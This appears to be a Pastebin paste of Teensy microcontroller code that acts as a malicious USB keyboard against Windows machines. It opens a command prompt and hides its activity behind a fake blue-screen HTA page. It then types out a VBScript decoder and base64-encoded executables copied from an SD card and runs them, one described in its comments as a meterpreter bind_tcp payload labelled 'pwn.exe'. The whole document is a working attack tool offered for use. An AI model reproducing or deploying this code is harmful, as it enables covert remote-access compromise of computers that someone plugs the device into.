API tools faq
paste
Guest User

teensyfin

a guest
Sep 12th, 2011
160
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 7.15 KB | None | 0 0
raw download clone embed print report
  1. // idea from Social-Engineer Toolkit Tee Attack Vector
  2. //
  3. // Special thanks to: Irongeek
  4. //
  5. // Edited and adapted by INIT_6 & podjackel
  6. // Getting payload from SD card instead off server.
  7. //
  8. // Lot of code was stolen from http://dabermania.blogspot.com/
  9. // current msfpayload:  windows/meterpreter/bind_tcp
  10. //
  11. // ** SD card attached to SPI bus as follows:
  12. // ** MOSI - pin 2
  13. // ** MISO - pin 3
  14. // ** CLK - pin 1
  15. // ** CS - pin 0
  16.  
  17. #include <SdFat.h>
  18. #include <Sd2Card.h>
  19. #include <SdVolume.h>
  20. #include <SdFile.h>
  21. #include <phukdlib.h>
  22.  
  23. const int chipSelect = 0; //for Teensy 2.0
  24. const int ledPin = 11;   // Teensy has LED on 11
  25.  
  26. Sd2Card card;
  27. SdVolume volume;
  28. SdFile root;
  29. SdFile file;
  30.  
  31. // serial output steam
  32. ArduinoOutStream cout(Serial);
  33.  
  34. // store error strings in flash
  35. #define sdErrorMsg(msg) sdErrorMsg_P(PSTR(msg));
  36. void sdErrorMsg_P(const char* str) {
  37.   cout << pgm(str) << endl;
  38.   if (card.errorCode()) {
  39.     cout << pstr("SD errorCode: ");
  40.     cout << hex << int(card.errorCode()) << endl;
  41.     cout << pstr("SD errorData: ");
  42.     cout << int(card.errorData()) << dec << endl;
  43.   }
  44. }
  45. //----------------------------------------------------------------
  46.  
  47. void setup(void){
  48.   Serial.begin(9600);
  49.  
  50.   delay(3000); //Sometimes the drivers can't load fast enough and the script fails.
  51.  
  52.   // Initialize SdFat or print a detailed error message and halt
  53.   // Use half speed like the native library.
  54.   // change to SPI_FULL_SPEED for more performance.
  55.   if (!card.init(SPI_HALF_SPEED, chipSelect)){
  56.     sdErrorMsg("\ncard.init failed");
  57.     return;
  58.   }
  59.  
  60.   // initialize a FAT volume
  61.   if (!volume.init(&card)){
  62.     sdErrorMsg("\nvolume.init failed");
  63.     return;
  64.   }
  65.  
  66.   // open the root directory
  67.   if (!root.openRoot(&volume)){
  68.    sdErrorMsg("\nopenRoot failed")
  69.    return;
  70.   }
  71. // end SD setup.
  72.  
  73. //Open cmd using phukdlib.h lib
  74.    CommandAtRunBarMSWIN("cmd.exe");
  75.    //Delay for cmd to open
  76.    delay(1000);
  77.    
  78.    //resize cmd window
  79.    //win_ResizeWindow();
  80.    
  81.    //delete any existing files named decoder.vbs and payload.txt
  82.    Keyboard.print("del /f c:\\bsod.hta c:\\decode.vbs c:\\payload.txt");
  83.    PressAndRelease(KEY_ENTER, 1);
  84.    
  85.    // open BSOD to hide all the non-sense.
  86.    if (file.open(&root, "bsod.hta", O_READ)) {
  87.      Serial.println("Opened bsod.hta");  
  88.      }
  89.    else{
  90.      sdErrorMsg("\nfile.open failed");
  91.    }
  92.    
  93.    //start copy con to place the BSOFD on disk
  94.    Keyboard.print("copy con C:\\bsod.hta");
  95.    PressAndRelease(KEY_ENTER, 1);
  96.    
  97.    //buffer: set b to signed init, read to end of file then print the char of the signed init b.    
  98.    int16_t b;
  99.    while ((b = file.read()) > 0) Keyboard.print((char)b);
  100.    
  101.    //ctrl-z then press enter to commit copy con changes
  102.    Keyboard.set_modifier(MODIFIERKEY_CTRL);
  103.    PressAndRelease(KEY_Z, 1);
  104.    Keyboard.set_modifier(0);
  105.    PressAndRelease(KEY_ENTER, 1);
  106.    
  107.    //close file.
  108.    file.close();
  109.    
  110.    //Run the bsod.hta
  111.    Keyboard.print("C:\\bsod.hta");
  112.    PressAndRelease(KEY_ENTER, 1);
  113.    
  114.    //Move window off screen.
  115.    //win_MoveWindow();
  116.    
  117.    // open a the file containing the Decode VBScript on sdcard.
  118.    if (file.open(&root, "decode.txt", O_READ)) {
  119.      Serial.println("Opened decode.txt");  
  120.      }
  121.    else{
  122.      sdErrorMsg("\nfile.open failed");
  123.    }
  124.    //use echo to write the vbscript to c:\decoder.vbs
  125.    Keyboard.print("echo ");
  126.    
  127.    //buffer: set n to signed init, read decode.txt to end of file then print the char value of the signed init n.    
  128.    int16_t n;
  129.    while ((n = file.read()) > 0) Keyboard.print((char)n);
  130.    
  131.    Keyboard.print(" > C:\\decode.vbs");
  132.    PressAndRelease(KEY_ENTER, 1);
  133.    
  134.    //close file
  135.    file.close();      
  136.    
  137.    //begin copy of payload in base64 to target//
  138.    //open file containing the base64 converted exe
  139.    if (file.open(&root, "payload.txt", O_READ)) {
  140.      Serial.println("Opened payload.txt");  
  141.      }
  142.    else{
  143.      sdErrorMsg("\nfile.open failed");
  144.    }
  145.    
  146.    //start copy con to place the base64 encoded text
  147.    Keyboard.print("copy con C:\\payload.txt");
  148.    PressAndRelease(KEY_ENTER, 1);
  149.    
  150.    //buffer: set t to signed init, read to end of file then print the char of the signed init t.    
  151.    int16_t t;
  152.    while ((t = file.read()) > 0) Keyboard.print((char)t);
  153.    
  154.    //ctrl-z then press enter to commit copy con changes
  155.    Keyboard.set_modifier(MODIFIERKEY_CTRL);
  156.    PressAndRelease(KEY_Z, 1);
  157.    Keyboard.set_modifier(0);
  158.    
  159.    PressAndRelease(KEY_ENTER, 1);
  160.    
  161.    //close file.
  162.    file.close();
  163.  
  164.    //begin copy of memoryshellexec in base64 to target//
  165.    if (file.open(&root, "mexec.txt", O_READ)) {
  166.      Serial.println("Opened mexec.txt");  
  167.      }
  168.    else{
  169.      sdErrorMsg("\nfile.open failed");
  170.    }
  171.    
  172.    //start copy con to place the base64 encoded text
  173.    Keyboard.print("copy con C:\\mexec.txt");
  174.    PressAndRelease(KEY_ENTER, 1);
  175.    
  176.    //buffer: set t to signed init, read to end of file then print the char of the signed init t.    
  177.    int16_t q;
  178.    while ((q = file.read()) > 0) Keyboard.print((char)q);
  179.    
  180.    //ctrl-z then press enter to commit copy con changes
  181.    Keyboard.set_modifier(MODIFIERKEY_CTRL);
  182.    PressAndRelease(KEY_Z, 1);
  183.    Keyboard.set_modifier(0);
  184.    
  185.    PressAndRelease(KEY_ENTER, 1);
  186.    
  187.    //close file.
  188.    file.close();
  189.  
  190. //run the vbscript to convert the text file to exe
  191.    Keyboard.print("cscript C:\\decode.vbs C:\\mexec.txt C:\\mexec.exe");
  192.    PressAndRelease(KEY_ENTER, 1);
  193.    
  194. //run the vbscript to convert the text file to exe
  195.    Keyboard.print("cscript C:\\decode.vbs C:\\payload.txt C:\\pwn.exe");
  196.    PressAndRelease(KEY_ENTER, 1);
  197. //Run mexec.exe to execute payload directly in flash
  198.    Keyboard.print("C:\\mexec.exe pwn.exe");
  199.    PressAndRelease(KEY_ENTER, 1);
  200.  
  201. //Run the exe
  202. //   Keyboard.print("C:\\pwn.exe");
  203. //   PressAndRelease(KEY_ENTER, 1);
  204.    
  205. //Turn LED light on for one sec so you know its complete.
  206.    pinMode(ledPin, OUTPUT);
  207.    digitalWrite(ledPin, HIGH);
  208.    delay(1000);
  209.    digitalWrite(ledPin, LOW);
  210.  
  211. }
  212. void loop(void){}
  213.  
  214. void win_MoveWindow(){
  215.  int move = 0;
  216.  Keyboard.set_modifier(MODIFIERKEY_ALT);
  217.  Keyboard.set_key1(KEY_SPACE);
  218.  Keyboard.send_now();
  219.  Keyboard.set_modifier(0);
  220.  Keyboard.set_key1(0);
  221.  Keyboard.send_now();
  222.  Keyboard.print("m");
  223.  while(move < 100) {
  224.   delay(5);
  225.   Keyboard.set_key1(KEY_UP);
  226.   Keyboard.send_now();
  227.   Keyboard.set_key1(0);
  228.   Keyboard.send_now();
  229.   move++;
  230.  }
  231. PressAndRelease(KEY_ENTER, 1);
  232. }
  233.  
  234. void win_ResizeWindow(){
  235.  int move = 0;
  236.  Keyboard.set_modifier(MODIFIERKEY_ALT);
  237.  Keyboard.set_key1(KEY_SPACE);
  238.  Keyboard.send_now();
  239.  Keyboard.set_modifier(0);
  240.  Keyboard.set_key1(0);
  241.  Keyboard.send_now();
  242.  Keyboard.print("s");
  243.  Keyboard.set_key1(KEY_LEFT);
  244.  Keyboard.send_now();
  245.  Keyboard.set_key1(0);
  246.  Keyboard.send_now();
  247.  Keyboard.set_key1(KEY_UP);
  248.  Keyboard.send_now();
  249.  Keyboard.set_key1(0);
  250.  Keyboard.send_now();
  251.   while(move < 75) {
  252.   delay(5);
  253.   Keyboard.set_key1(KEY_RIGHT);
  254.   Keyboard.send_now();
  255.   Keyboard.set_key1(0);
  256.   Keyboard.send_now();
  257.   Keyboard.set_key1(KEY_DOWN);
  258.   Keyboard.send_now();
  259.   Keyboard.set_key1(0);
  260.   Keyboard.send_now();
  261.   move++;
  262.  }
  263. PressAndRelease(KEY_ENTER, 1);
  264. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!